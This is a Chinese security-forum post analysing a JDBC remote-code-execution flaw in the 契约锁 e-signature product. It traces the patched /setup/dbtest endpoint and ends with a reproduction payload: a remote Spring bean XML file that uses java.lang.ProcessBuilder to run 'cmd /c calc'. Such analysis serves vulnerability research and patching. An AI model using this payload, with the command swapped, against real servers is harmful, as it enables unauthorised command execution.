问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
契约锁JDBC RCE漏洞分析
漏洞分析
契约锁JDBC RCE漏洞分析
契约锁JDBC RCE漏洞分析 =============== 分析补丁 ---- 对补丁进行反编译,看到特殊的filter:  对`security.rsc`进行解密,找到被过滤的接口  漏洞分析 ---- 找到`/setup/dbtest`所在的类:  其主要是获取DatabaseProperties类型的参数  其中包括数据库类型,host,name等 然后进入`setupService.check`方法,   最终是调用DatabaseConnection#getConnection,通过反射传入的db实例化对象,调用其getConnection测试jdbc连接  可用的db如下  漏洞复现 ----  远程xml为: ```xml <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg><list><value>cmd</value><value>/c</value><value><![CDATA[calc]]></value></list></constructor-arg> </bean> </beans> ```
发表于 2025-06-27 10:00:48
阅读 ( 249 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
中铁13层打工人
80 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!